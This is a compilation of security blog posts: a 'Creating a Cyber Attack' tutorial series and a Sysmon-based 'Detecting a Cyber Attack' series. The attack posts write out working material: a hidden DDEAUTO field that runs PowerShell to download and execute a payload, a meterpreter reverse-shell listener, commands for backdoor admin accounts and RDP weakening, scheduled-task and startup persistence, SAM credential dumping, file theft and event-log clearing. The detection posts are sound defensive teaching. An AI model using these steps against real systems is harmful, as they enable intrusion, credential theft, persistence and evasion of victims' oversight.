Creating a Cyber Attack – Part 9 (Making a malicious Word document using DDE and Powershell)

In part one of this series we looked at making a malicious Word document using DDE, which l connected to our malicious site and automatically run malicious code to give us access to the victim, but also give us a fall back where the user is also prompted to install a secure file viewer should our automatic code not run. This gave us 2 chances to infect the victim machine.

This new updated version will show how we can use DDE and Powershell to download and run a malicious exe from a Word documents. We can create a document which when opened auto prompts the user to click a pop up, and then automatically connect to our malicious website to download and run Malware.

If you are a defender the most important thing to understand is how attacks like this work so you know what you are looking out for. With that in mind, let’s go make some Malware.

If you have not read the previous blogs of this series then I recommend you do as they will show how you create the malicious exe, and configure the malicious website. This blog will cover the code in the document, so if there is any part you don’t understand if you read the other blogs each part is explained in more detail. https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/

Here we start with the document already created just needing the DDE code for the exploit, we’ve added some images and text to try and socially engineer the victim user into thinking it is legitimate and click the pop up box. In this demo we will be using http://legitimate.website.com which is just a private test site for this demo, so you will need your own website to host the malware.

We open up our prepared Word document

The code we are going to insert is below

DDEAUTO c:\windows\system32\cmd.exe “/k powershell.exe
Invoke-WebRequest -Uri ‘http://legitimate.website.com/secure/secure.exe’
-OutFile ‘C:\Users\bradley.cain.testadmin-PC\Downloads\secure.exe’
;powershell.exe Start-Sleep -seconds 10;powershell.exe .\secure.exe”

  • DDEAUTO c:\windows\system32\cmd.exe “/k powershell.exe – This is where the DDE function first launches a command prompt, which then launches Powershell
  • Invoke-WebRequest -Uri ‘http://legitimate.website.com/secure/secure.exe’ – This tells powershell to connect to our website and get our malicious file
  • -OutFile ‘C:\Users\bradley.cain.testadmin-PC\Downloads\secure.exe’ – This tells Powershell where to save the file
  • ;powershell.exe Start-Sleep -seconds 10;powershell.exe .\secure.exe” – This tells powershell to wait 10 seconds before starting our malicious file, which ensures that the download has completed before trying to start the exe.

Move the cursor down the page so the code will not be visible when the document is opened and then click “Insert” from the ribbon menu, then “quick parts” then “Field” from the drop down menu. Ensure “=(Formula)” is selected then click OK.

This image has an empty alt attribute; its file name is DDEDoc2.png
This image has an empty alt attribute; its file name is DDEDoc3-1024x603.png

Then you should see the below in your document. This is our formula field

This image has an empty alt attribute; its file name is DDEDoc4.png

Right click and choose “Toggle Field Code”

This image has an empty alt attribute; its file name is DDEDoc5.png

Then you’ll see this;

This image has an empty alt attribute; its file name is DDEDoc6-1.png

Let paste in our code

We start our listener on our attackers device

Our victim opens the document and gets our pop up messages, which they can see by the guide behind that these are expected and to allow it. It’s an “Assured secure document” after all. 😉

That’s it, our program downloads and runs in the background without the user being aware, and the attacking machine gets it’s connection.

Finally to show we have a connection and are able to run commands we pop calculator to the desktop (obviously you would not do this as a real life attacker, it is shown here to prove we can execute commands on the victim machine).

Hope you enjoyed learning what is possible within DDEAUTO function, but this is a basic demo, we will come back and show an example of obfuscated powershell commands as a more real world example. If you are interested in learning how to spot this type of attack then take a look at our blog series on detecting cyber attacks. https://blog.2code-monte.co.uk/2021/02/26/detecting-a-cyber-attack-part-1-sysmon-endpoint-install/

Detecting a Cyber Attack Part 4 (Sysmon – Basic malware hunting 2)

In our first malware hunting blog we looked at an incident where a user had downloaded a malicious application from a website. Here we are going to investigate a malicious document which was received via email. This is our second basic investigation , but we will continue to ramp things up over the coming months.

Modern antivirus, despite being very good at identifying and blocking known threats, it can still be easily bypassed by unknown exploits (zero days) and malicious MS Office document macros. It can also have issues like any other software preventing it from working correctly which is why you need an effective logging solution that allows investigations to identify instances where malware has circumvented any protection in place.

This blog will use techniques we taught during our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt you can use the same malicious exe and website from that exercise. The first blog is here; https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/

In our scenario and end user has been duped into opening a malicious document. We have received some unusual traffic alerts on the firewall from this asset, so we connect to take a look. Let’s jump in.

Although we don’t know it yet, the user received the below document

which when opened started a malicious script which started a remote connection back to the attacker providing full access to the asset. This process is shown in the series of images below.

Once the victim has clicked yes in the document, the attacker sees the connection in their terminal.

The malicious process is running as PID 4048.

We obviously do not have this information yet, but luckily we have sysmon configured as covered in the previous blogs so let’s see what we can find.

We know the user works in Finance, we know when we first saw alerts in the firewall, and we also know that the number one attack vector for end users is phishing emails. Speak to the user, do they remember opening an attachment which crashed, or received any unusual emails, or pop ups when browsing the internet. All and any info the user can provide could be important.

We decide to look for unusual activity relating to Office programs as a start. Now obviously we can just run netstat and look for unusual connections, but we are concentrating on sysmon here.

We find a Word doc being opened by WINWORD.EXE but nothing odd yet

However this next log looks suspicious as we have what appears to be WINWORD.EXE (ParentImage) opening cmd.exe (Image), and the parent commandline seems to be the word doc we saw earlier.

Now we have cmd.exe launching powershell, which then runs an “Invoke-WebRequest” commandline which is used to download files. Here it creates a file named “secure.exe”

We now have powershell launching another powershell instance which instructs the session to wait for 10 seconds.

Next we see powershell making an outbound connection to the same website mentioned in the above logs

And finally here we see confirmation of the malicious remote session connecting to “legitimate.website.com” on port 4444, with the Process ID of 4048.

If we refer back to Task Manager we can see that this matches the malicious exe.

Again this is a basic technique, but it will help you to understand the types of things you should be looking for. In future blogs we will go on to look at obfuscated commands and how we decode them to get the information we need.

Detecting a Cyber Attack Part 3 (Sysmon – Basic malware hunting)

In our first two blogs of this series we installed and configured a basic Sysmon set up with a verbose custom view, now we are going to show how even this simple set up can help with threat hunting and incident response. This is a very basic investigation to start with, but we will continue to ramp things up over the coming months.

Modern antivirus, despite being very good at identifying and blocking known threats, it can still be easily bypassed by unknown exploits (zero days) and malicious MS Office document macros. It can also have issues like any other software preventing it from working correctly which is why you need an effective logging solution that allows investigations to identify instances where malware has circumvented any protection in place.

This blog will use techniques we taught during our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt you can use the same malicious exe and website from that exercise. The first blog is here; https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/

In our scenario and end user has been duped into visiting a malicious website and downloading an application. They contact the service desk to report they think they have made a mistake, and we are going to try and identify if there is any malicious activity on their asset. Let’s jump in.

Our user has visiting the following site

And run the following application from the site

The download claims to be an update for flash player

We connect to the asset, open Event Viewer and select our custom view we created earlier. We know the rough time they visited the website and we quickly find a file create alert at the same time for the file “update_flash.exe”

The next log entry shows the process create entry for “flash_update.exe” which was downloaded from legitimate.website.com

We now have the .exe name and the website address. The same log also shows the process ID (2508) and the parent process ID (3584). Let’s use Task Manager to see if we can gather a bit more info, and see if they are still running.

Once Task Manager has opened select to show processes from all users.

Then select “view”

and ensure PID is ticked so the process identifier column is displayed

Now we can see the PID, click the column header to sort numerically making them easier to find.

We can see the parent process 3584, but no sign of 2508 even though we can see “flash_update.exe” is still running but under a different PID.

Let’s right click the “flash_update.exe” process and look at the properties.

We can see that although the exe is named flash_update the description is completely different, and the product name seems to suggest it is something to do with a http server.

If we compare this to a genuine Adobe file already installed on the same asset it’s clear something is not right.

The genuine file also has a digital signature.

Let’s back back into the Sysmon logs and look for more info. Below we can see in the time line after the file create, and process create we have a network connection detected for the same “flash_update.exe”. Sysmon gives us a bucket load of information for this including;

  • The process ID
  • Source and destination hostname
  • Source and destination IP addresses
  • Source and destination port numbers

Let’s open a cmd prompt and use netstat to look for the connection.

We are going to use the flags “a” “n” “o” with the below cmd.

  • -a – Displays all active TCP connections and the TCP and UDP ports on which the computer is listening
  • -n – Displays active TCP connections, however, addresses and port numbers are expressed numerically and no attempt is made to determine names.
  • -o – Displays active TCP connections and includes the process ID (PID) for each connection. You can find the application based on the PID on the Processes tab in Windows Task Manager.

You can simply use netstat to identify just tcp ports, or just the specified port but for demo purposes we are using “-ano” There’s a good netstat tutorial here; https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat

We have highlighted the column headers this command provides and also highlighted the malicious process we have identified as running on this asset.

Sysmon has provided most of the information we need to be able to either monitor the machine for further information or terminate the malicious process.

Here we have the attackers view of the connection

Here we have shown how to run a basic investigation using only Sysmon and Task Manager, there are lot’s of other tools at our disposal and we will cover some of these in the future.

Detecting a Cyber Attack Part 2 (Sysmon – Create a verbose custom view)

As covered in the previous blog, sysmon is very powerful for logging and alerting, however the logs are hidden deep in the folder structure of Event Viewer so ideally we want to be able to have quick access to these logs when threat hunting locally on an asset. (We will cover centralising logs later in the series or have a read of our previous blog series on building a free SIEM solution. The sysmon part is here https://blog.2code-monte.co.uk/2019/07/06/set-up-windows-event-forwarding-with-sysmon-using-group-policy-free-siem-part-3/ if you want to take a look.

However back to today’s blog. We don’t want to have to go searching for sysmon logs and sometimes we want a different level of logging, either verbose or brief depending on how much information you wish to see, which is where custom views come in handy. In this demo will will create a verbose log which will show everything, however in other demos we will create custom views for very specific logs and events. As we are starting from scratch here, we want to see everything.

You’ll find sysmon logs under Event Viewer > Applications and Services > Microsoft > Windows > Sysmon > Operational so let’s open up Event Viewer and create our custom view.(Although we are using Windows 7 here in our lab, the commands are exactly the same in Windows 10)

Type eventvwr in the search bar

Below we see the native location of the sysmon logs

Select create custom view on the right hand side of Event Viewer and complete the steps as shown. Remember we are creating a verbose log so it will create a lot of information.

Tick all the boxes
Select Sysmon from the dropdown
Select All Task Categories
Select all keywords
The completed form should look like this
Create a name and add a description (If you do not add a description it will not work)
We can see our custom view at the top left of Event Viewer.

That’s it! Simple right? In the next blog we will use this view to do some basic malware hunting.

Detecting a Cyber Attack Part 1 (Sysmon – endpoint install)

Now we are finished with our “Creating a Cyber Attack” (Part 1 here; https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/) series where we showed how a cyber attack is put together, we are now going to move onto detection.

Sysmon has been around for a while now, but recently is really gaining traction as a must have for organisations. Sysmon basically allows enhanced logging of certain events allowing analysts to more easily identify malicious activity, and configure custom alerts and configurations depending on the environment.

Sysmons capabilities include;

  • Logs process creation with full command line for both current and parent processes.
  • Records the hash of process image files using SHA1 (the default), MD5, SHA256 or IMPHASH.
  • Includes a process GUID in process create events to allow for correlation of events even when Windows reuses process IDs.
  • Includes a session GUID in each event to allow correlation of events on same logon session.
  • Logs loading of drivers or DLLs with their signatures and hashes.
  • Logs opens for raw read access of disks and volumes.
  • Optionally logs network connections, including each connection’s source process, IP addresses, port numbers, hostnames and port names.
  • Detects changes in file creation time to understand when a file was really created. Modification of file create timestamps is a technique commonly used by malware to cover its tracks.
  • Generates events from early in the boot process to capture activity made by even sophisticated kernel-mode malware.

For full capability information visit the link below

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

For the configuration file we will be using the @swiftonsecurity template from github at the below URL

https://github.com/SwiftOnSecurity/sysmon-config

This is a great template to start off with, and if you open the xml file every line is commented so it’s also great place to learn. In our demo we need to remove the DNS section as it is not supported in Windows 7.

Right let’s get cracking and get Sysmon installed.

To download the official version of Sysmon go to https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon you’ll need to unzip and save to a convenient location.

Then download the config file from here https://github.com/SwiftOnSecurity/sysmon-config

Now we need to edit the config file, I just did this in good old notepad.

Find the DNS query section, then from “<RuleGroup name=”” groupRelation=”or”> highlight and delete the whole section.

Save your changes, then copy the file so it is in the same folder as your sysmon download.

To install Sysmon you need to run it from an admin cmd prompt, which you can do by right clicking and selecting “run as administrator”.

Once your cmd is open you need to copy the location of your Sysmon files so you can run the command from inside the folder.

type “cd” then paste in your location

Now we just run the cmd as shown below

sysmon.exe -accepteula -i sysmonconfig-export.xml

That’s it! If you receive no errors then Sysmon should be running. Let’s go look at some logs in Event Viewer.

Sysmon logs are stored under

Application and Services Logs/Microsoft/Windows/Sysmon/Operational

The below image shows Sysmon logging us opening Event Viewer

If we now open Firefox we get lot’s of logs showing what it is doing, processes it runs, where it updates from, dlls it uses, and lot’s of other info which if we were hunting malware would be invaluable.

Hoped you enjoyed this quick look at Sysmon, we will be covering it in more detail as we progress.

Creating a Cyber Attack – Part 8 (Post Exploitation – Gaining Persistence 2)

In the final video of this series we continue with post exploitation using metasploit and meterpreter, using Windows commands to gain persistence.

We have created our new user and have remote desktop access. Now we ensure our backdoor is always running and even if it crashes or loses connection we have ways to restart it without having to interact with the victim machine.

We will then show you a post exploit module from metasploit which you can run against a machine you have access to which will test the victim for further vulnerabilities which you can use to dig deeper into the machine and possibly pivot around the network.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps to this point are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Windows commands used in this video are;

  • SCHTASKS /CREATE /TN BACKDOOR /SC HOURLY /ST 10:00 /F /RL HIGHEST /SD 22/12/2020 /ED 22/12/2030 /tr “C:\BACKDOOR.exe /RU testadmin-pc\backdoor /RP £@55w.rd
  • xcopy BACKDOOR.exe “C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”

The metasploit commands are;

  • background
  • use post/multi/recon/local_exploit_suggester
  • sessions
  • set session
  • run

We are going to create a new task which will run hourly which runs our malicious exe which in this demo is stored in the root of the C Drive.

In our command we provide a valid username and password (if you are following along from the previous video this would be our “secretuser” account and the password you specified. We also provide a name, a start and end time, schedule, location of the exe, and the credentials.

We can see our new task created successfully below. This means if we lose connection as long as the pc is in use this task will run every hour and provide us with a connection.

Now we want to look at the users startup programs and add our BACKDOOR.exe to this folder so every time the user logs in our exe will run and provide us a connection.

Our exe is currently stored in the users documents folder which is where our prompt is running from so we just need to specify where the file is and where we want to copy it to using the xcopy command.

Success. Now our exe will run whenever the user logs in.

To run the metasploit exploit suggester we need to exit from Windows and meterpreter and load the module, so we use exit, and then background our session.

We load the module using use post/multi/recon/local_exploit_suggester then we want to show options

We need the session number so we use the sessions command to find the session we want, then use set session to add it. (In our case 12)

Once this is configured we can run the exploit. It will take a while to complete, but if it finds anything it will list them as below. You can then investigate each one without having to be connected to the victim machine.

Finally we test our meterpreter connection being disconnected when the victim machine restarts, but then see a new connection created once the user logs back in.

We restart our listener using exploit/multi/handler

We see our new session (13) connect as expected.

Congratulations if you have followed this series through. You should now have a much better idea of what you are up against. This has been a beginners look at a Cyber Attack from start to finish, but we will look at more complicated and in depth aspects of Cyber Security in the future. Thanks for joining us on this journey.

Creating a Cyber Attack – Part 7 (Post Exploitation – Gaining Persistence )

In this video we continue with post exploitation using metasploit and meterpreter, but this time using Windows commands to gain persistence. We start with our meterpreter shell, then use the Windows cmd prompt to run native commands to enumerate shares and users. We will also enable RDP, and create a new user adding the account to the required groups allowing remote access using reduced authentication controls.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

Don’t forget, for an attacker information is key. The more they know the better equipped they are to find a chink in the security of the defenders network.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  • net share
  • net user
  • net user secretuser £@55w.rd /add
  • net localgroup “Administrators” secretuser /add
  • net localgroup “Remote Desktop Users” secretuser /add
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

Let’s jump in

We start from our meterpreter prompt and launch our Windows prompt using shell

Used without parameters, net share displays information about all of the resources that are shared on the local computer. We see 3 shared locations, including the “Network Share” This would be a good place to start any file searches for “passwords” “payment” etc.

Used without parameters, net user displays all of the user accounts on the local computer. We can see the six available on the victim currently, however this will soon be seven.

Let’s create a new user named “secretuser” with the password “£@55w.rd”. Now in the real world this will be named to make it blend in with other accounts, they will follow your naming standards and make sure it does not stand out.

The command completes successfully and on the victim machine we can see the new account. Now a standard user account is not much use to us at this point so we want to add it to some groups which will allow us remote access and higher permissions. In this case we add it to the “Administrators” and the “Remote Desktop Users” groups.

Both complete successfully and we again confirm on the victim machine.

To enable RDP we need to run three commands. The first enables RDP, the second sets the firewall rules and the third disables Network Level Authentication.

  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

All complete successfully (however we do get one message that the netsh firewall command is depreciated so I need to update myself on the new commands), so let’s test our connection.

and test our new login account.

We manage to login successfully (at the second attempt lol), but we would not want to kick off another user as this would raise suspicions so we just close the connection for now.

In the next post we continue with the last video in this series.

Creating a Cyber Attack – Part 6 (Post Exploitation – With Msf console )

In this video we continue with post exploitation, this time using metasploit and meterpreter. We have socially engineered the victim to visit our malicious webpage which has provided us with an initial connection to our victim machine, and our meterpreter shell. Now we will show a few simple commands you can use to escalate your permission level, clear logs and gather info post exploit.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  1. getuid – shows who we are currently running as on the victim server.
  2. sysinfo – gets the details about the victim computer such as OS and name.
  3. screenshot – grabs a screenshot of the meterpreter desktop.
  4. download – downloads a selected file.
  5. upload – uploads a selected file.
  6. getsystem – uses 15 built-in methods to gain sysadmin privileges.
  7. load kiwi – mimikatz (if you don’t know what this is go have a look online) has been ported into Metasploit and when you load the extension you can use it straight from the meterpreter session.
  8. lsa_dump_sam – dumps the sam database file on screen. (uses Kiwi).
  9. ps – lists running processes on the victim machine.
  10. shell – opens a command shell on the victim machine.
  11. clearev – clears the event logs on the victim’s computer

We are on our victim machine using our Meterpreter shell, and first off we want some basic information from the machine such as the user account and OS.

Using the getuid command we can see we are running as administrator on testadmin-pc

Using the sysinfo command shows us a bit more about the host; for example that it is a 32-bit version of Windows 7 running service pack 1.

Next we take a screenshot of the desktop just out of curiosity. You never know what you might grab by chance.

Next we use the download command to steal a file named “Passwords.txt”. (Obviously in real life you will need to list and browse the victim file system looking for files of interest, but we have skipped that part in this video as it would be boring just watching me browse through directories lol!)

Note the double back slashes.

Here we can see the file saved to our root directory after being downloaded from the victims machine.

We can also upload files if we wish. If want to install a more persistent backdoor (even something like teamviewer) we can get our installer onto the target.

BACKDOOR.exe is the file we want to upload. Again note the double back slashes below.

Above we can see the file on the victims machine. (You would obviously upload to somewhere less conspicuous)

Currently we are running as administrator which is really great, but if we want to access all other user credentials on the victim machine we need to be running as system. Let’s try and elevate our privileges using the getsystem command.

Success!

Now let’s load kiwi and try and dump the SAM file. First we load kiwi

Then run lsa_dump_sam

Success! It returns 6 account names and their password hashes. (If you don’t know what to do with password hashes check out our guide on how to crack them). https://blog.2code-monte.co.uk/2020/08/02/cracking-password-hashes-hacking-rdp-servers-part-3/

If we want to look at running processes we simply use ps

Below we have highlighted our malicious process running on the victim which is our meterpreter shell.

If we want to open a Windows cmd prompt and interact with the victim machine using Windows commands we use shell.

Here we just open the windows calculator to demo, but there is much more you can do which we will cover in future guides.

All of this activity leaves a trace and we don’t want anyone knowing what we have been up to so before we go we want to delete the logs from the system. For this we have the clearev command.

We open up event viewer on the victim so you can see the logs full initially, then empty after the command has completed.

Now clearing the log is evidence in itself that something has happened on the machine, but they will not have specific events which can point them in the right direction, and some will never check event logs anyway so won’t even notice.

Hope you got something out of this, and it has helped you be more aware of what can happen on a system. There will be one more post exploitation video, and then we will start to look at how you detect, and spot this activity on your endpoints.

Creating a Cyber Attack – Part 5 (Post Exploitation – With BeeF )

In this video we pick up where we left off in Part 4. We have socially engineered our victim to visit our malicious website which has provided us with an initial connection to the victim machine. Attacker on the right, and victim on the left.

If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

We will show a few simple techniques you can use to get a meterpreter shell to get a better foothold on the machine and maybe achieve persistence (permanent connection), and gather other information from the victim machine post exploit. Our victim machine has our malicious site and Facebook open in their browser.

The BeeF modules we will be going through are;

  1. Get Clipboard
  2. Detect Social Networks
  3. Pretty Theft
  4. Fake Notification Bar
  5. Fake Flash Update

Let’s get straight into it;

Get Clipboard – This is a simple one, and is under “Hosts” in the folder structure. The module will basically grab anything that is stored on the victim machines clipboard. In our example the victim has copied their credit card number to use in a website to buy something. We select the module and run “execute”, then after it has grabbed the info it is displayed in the window as shown.

Detect Social Networks – Another self-explanatory one here. This module is below “Network” in the folder structure and allows us to see which social networks the victim is logged into (as in real life you won’t see their desktop obviously). Why do we want this? Well if you know what they are logged into you can use the next module “Pretty Theft” to steal login details. We simply click execute on this, nothing else to configure.

Pretty Theft – This module is really simple to use, and basically provides us with some login box templates which we can pop-up on the victims screen to attempt to trick them into thinking their session has expired and they need to login again. Pretty Theft is under “Social Engineering” in the folder structure, and is simple to configure offering only basic config options. In our example we know the victim is logged into Facebook so we pop-up the Facebook template, then collect the username and password in the window as shown.

We then do the same, except we change the pop-up to a Windows themed box to try and get the Windows password of the victim as well.

Fake Notification Bar (IE) – This module will show a fake notification with a message and payload of your choice at the top of the victim machines browser. We keep the standard message, but specify our custom payload which will allow us to get a meterpreter shell on the victim allowing us more access to the machine. We fire up our listener in metasploit then show the pop-up which the victim clicks and installs our malicious payload. We then check metasploit and can see we have an active connection, which we confirm by running sysinfo.

Fake Flash Update – This works in much the same way as the module above, and can also be found under Social Engineering. We provide the URL of the custom payload we want to deliver and the location of the pop-up image we wish to use, in this case Flash, but you could use any update pop-up, we are just using flash in this demo. Once you have added your URLs again just hit execute and the victim will receive your pop-up.

That’s all done in under 5 minutes, so you can see just how scary this is and how quickly it can go wrong. We are going to leave this here, and in the next video we will be covering post exploitation using Metasploit and meterpreter.

Creating a Cyber Attack – Part 4 (Exploiting – Getting Access )

In Part 4 of this series you can sit back and enjoy the fruits of your work as all we need to do now is ensure everything is running then launch our attack. We will email a link to our victim and then once the file is downloaded and opened we will see how everything fits together to exploit the victims computer. Come back for future videos when we will show some post exploitation steps we can take now we have control of our victim.

If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

First in our Kali machine we check that BeeF is running by going to our browser URL. You can also see there are no online browser sessions at present in the left hand menu.

Next we ensure our malicious website is running.

Then if have not already done so we create our listener in the metasploit framework on our attacking device so the malware has something to connect back to.

use exploit/multi/handler

Load our payload

set payload windows/meterpreter/reverse_tcp

Configure our payload, by setting the listening host (lhost) to our attacking machines IP address.

show options

set lhost 192.168.56.106

Then start the listener

run

Now we are ready. At this point the demo starts to show the victim reading the email. clicking the link, downloading the file then opening it. Activating the malware and connecting to our site.

As soon as the website opens we will have a connection in BeeF as this does not require any user interaction with the site and injects the malware automatically when the web page is visited. You will see online browsers in your web console.

In our demo you will also see us use the commands tab to launch a social engineering attack by using the “Fake notification bar” exploit built in to the console. We can use this to load additional malware onto the system by getting the user to click on the bar and accept the prompt. We will cover this in more depth in future videos.

To get our meterpreter session we need to get the victim to download our security software as advertised on our website and in the malicious document.

Once the victim has carried out these steps you will see the connection in meterpreter. We then run the sysinfo cmd to show we are on the victim machine. Again we will be showing some post exploitation steps in future videos so stay tuned for those.

As you can see from this sort series of videos there are multiple ways that malware can infect your PC, and I hope we have demystified it a little as well.

Cyber attacks will have fall back measures to provide the best odds that if a link is clicked or document opened that they will be successful, which is why we have shown 2 different methods in this demo from the same malicious document.

This has been a very simple demo showing simple methods but I hope we have helped to show the type of things that can happen.

Until next time.